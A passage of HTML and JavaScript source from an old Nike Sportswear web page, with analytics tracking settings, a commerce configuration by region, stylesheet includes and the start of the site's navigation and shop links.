trackExternalLinks:true,
linkInternalFilters:"javascript:,nike,rga"
};
var track_site = "USSPRT";
var currentUrl = window.location.href;
var trackingSuite = "nikesportswearus,nikesportswearnam,nikeall";
// Only include commerce rollup tag in commerce enabled pages (so far just Bootroom/Players)
if (currentUrl.indexOf("bootroom") != -1 || currentUrl.indexOf("players") != -1) {
trackingSuite = trackingSuite + ",";
}
var sitewide_tracker_obj =
{
account:trackingSuite,
currency:"USD",
charset:"UTF-8"
};
var nav_tracker_obj=
{
s_account:sitewide_tracker_obj.account,
prefix:"USSPRT>",
setup:
{
pageURL:location.href,
referrer:document.referrer
},
persistent:
{
server:"nikesoccer",
channel:"soccer",
prop12:"sportswear",
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID"
}
};
</script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" charset="utf-8">
var NIKE_COMMERCE_CONFIG={ title : "Nike Football" , site : "sportswear" , membershipId : "304" , registerPath : "nikeos/p/sportswear/${LANG_LOCALE}/profile?page=register&fields=&continueURL=profile%3Fpage%3Dpersonal_info" , siteId : "47" , siteId_EMEA : "48" , userType : "defaultUser" , categoryHeadersEnabled : "true" , languageTunnelURL : "/nikeos/p/sportswear/language_tunnel/?change_region=true\n\n" , configBaseURL : "/sportswear/global/xml/commerce/" , commerceBaseURL : "commerce" , US_Catalog : "102601" , EMEA_Catalog : "102602" , commerceNavTabs : [ "shop" , "products" , "nikeid" , "nikeid_landing" ] , DETERMINE_COMMERCE_REGION : { en_US : [ { US : "1" } , { AT : "2" , BE : "2" , DK : "2" , FI : "2" , FR : "2" , DE : "2" , IE : "2" , IT : "2" , LU : "2" , NL : "2" , ES : "2" , SE : "2" , GB : "2" , CZ : "2" , GR : "2" , HU : "2" , NO : "3" , PL : "2" , PT : "2" , SI : "2" , CH : "3" } ] , es_ES : { ES : "2" } , de_DE : { DE : "2" } , fr_FR : { FR : "2" } , it_IT : { IT : "2" } , cs_CZ : { CZ : "3" } , pl_PL : { PL : "3" } } };
</script>
<script type="text/javascript" src="/nikeos/global/js/nikecommerce.js"></script>
<script type="text/javascript">
ns.gv.xmlpath = "/aw77/modules/77looks/77looks";
</script>
<!-- begin aw77 header -->
<title>Nike Sportswear</title>
<link type="text/css" rel="stylesheet" href="/sportswear/assets/aw77/css/common.css" media="screen"/>
<script type="text/javascript" src="/sportswear/assets/aw77/js/common.js"></script>
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/aw77/css/ie/ie.css"/>
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/aw77/css/ie/ie6.css"/>
<![endif]-->
<link rel="stylesheet" href="/sportswear/assets/aw77/css/locales/en_US.css" type="text/css" media="screen"/>
<!-- end aw77 header -->
<!--<link rel="stylesheet" href="/sportswear/global/features/aw77_stories/shell/nsw_master.css" type="text/css" media="screen" title="no title" charset="utf-8" />
<link rel="stylesheet" href="/sportswear/global/css/home3.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/sportswear/global/css/aw77/aw77_morethan.css" type="text/css" media="screen" />
-->
</head>
<body id="aw77" class="NONE_SET">
<div id="bodywrapper">
<noscript><div class="noscriptmsg">You need to enable JavaScript to get the most out of the Nike Football web site.</div></noscript>
<div id="p_outerwrapper">
<div id="p_outerwrapperinner">
<div id="p_innerwrapper" class="en_us">
<div id="p_innerwrapperheader">
<div id="p_contentstub">
<ul>
<li><p class="breadcrumb"><a href="http://www.nike.com/">Nike</a> &gt; Nike Sportswear</li>
<li><h1><strong>Nike Sportswear</strong></h1></li>
</ul>
<div class="cf">
<div class="leftcol fullwidth">
<p>AW77 Insiders. Take it to the Street. The code says don't play your style straight - mix it, twist, break it. From the AW77 to the AM90, let the Nike Sportswear Insiders show you their combination to unlocking the look.</p>
</div>
</div>
</div>
<div id="p_lozenge">
<div id="nav-module-top_swf"></div>
</div>
<div id="p_navigation">
<div class="navigationinner">
<div id="nav-module">
<form id="nav_input_form" action="javascript:search()" method="post"><input id="nav_input" type="text" name="searchquery" size="10"/></form>
<div id="nav-module-left_swf">
<!-- NAV XML OBJECT, SITEXML AT BOTTOM -->
<div id="nav" default_font="Victory-Neue Bold" embed_font="true" class="invisible">
<div id="search" font="Victory-Neue Light">
<a class="base" href="http://www.nike.com/nikeos/p/sportswear/en_US/search?" ></a>
<div class="displayText" label="openLabel" >SEARCH</div>
<div class="displayText" label="closeLabel">CLOSE</div>
<span class="query">srch=</span>
</div>
<!-- Profile -->
<div id="profile" preload="true" href="https://www.nike.com/services/profileService?action=getprofile">
<a id="login" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=signin">LOGIN</a>
<a id="logout" href="https://www.nike.com/services/profileService?action=logout">LOGOUT</a>
<a id="account" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=mynike">VIEW MY PROFILE</a>
<span id="profile">PROFILE</span>
<span class="name">fields=screenname</span>
</div>
<!-- AUDIO PLAYER
<div class="audioButton" href="/sportswear/us/en_US/xml/flashmodule/audioplayer/audioConfig.xml"></div>
-->
<!-- PRODUCTS -->
<div class="primaryButton" label="shop" openonclick="true" commerce_dependant="true">
<a class="action" type="none" href="#">SHOP</a>
<div class="secondaryButton" label="men" openonclick="false">
<a class="action" type="none">Men</a>
<div class="tertiaryPanel">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^4294965514^4294967157&p=PWP&t=Men%27s%20Products" position="top">All</a>
<div class="tertiaryColumn" label="men_shoes" title="Shoes" width="130">
<div class="tertiaryButton" label="men_shoes_af1">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^12001^4294961611^4294965496^4294965514^4294967157&p=PWP&t=Men%27s%20Air%20Force%201%20Shoes">Air Force 1</a>
</div>
<div class="tertiaryButton" label="men_shoes_am">
<a class="action" type="url" href="http://www..